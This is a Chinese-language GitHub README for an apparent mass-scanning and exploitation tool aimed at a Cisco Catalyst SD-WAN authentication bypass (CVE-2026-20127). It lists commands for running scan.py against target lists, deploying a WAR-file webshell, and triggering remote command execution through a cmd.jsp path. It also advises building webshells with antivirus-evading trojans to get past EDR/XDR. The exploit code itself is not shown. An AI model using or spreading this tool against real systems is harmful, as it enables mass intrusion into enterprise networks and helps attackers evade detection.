BugFor-Pings/CVE-2026-20127_EXP
GitHub: BugFor-Pings/CVE-2026-20127_EXP
针对 Cisco Catalyst SD-WAN 身份验证绕过漏洞(CVE-2026-20127)的批量扫描与利用工具,支持命令执行和自定义 webshell 部署。
Stars: 0 | Forks: 0
# CVE-2026-20127_EXP
Cisco Catalyst SD-WAN 身份验证绕过漏洞(CVE-2026-20127)漏洞利用EXP
### 基础用法
python scan.py -f targets.txt
### 显示详细信息
python scan.py -f targets.txt -v
### 调整线程数并保存结果
python scan.py -f targets.txt -t 10 -o vulnerable.txt
### 指定WAR文件路径
python scan.py -f targets.txt -w cmd.war
### 指定WAR文件路径调整线程并保存结果
python scan.py -f targets.txt -w cmd.war t 10 -o vulnerable.txt
# =======注意事项========
漏洞复现成功后访问/cmd.gz/cmd.jsp?cmd=whoami 会在页面显示结果
如果需要换成webshell,请自己制作war包(建议使用免杀马,经过测试存在Windows系统会有EDR或XDR)
标签:Catalyst SD-WAN, CISA项目, Cisco SD-WAN, CVE-2026-20127, EDR绕过, JS文件枚举, Python, WAR文件上传, Webshell, 企业网络安全, 无后门, 漏洞利用EXP, 漏洞复现, 编程工具, 网络安全, 身份验证绕过, 远程代码执行, 逆向工具, 隐私保护, 高交互蜜罐, 高危漏洞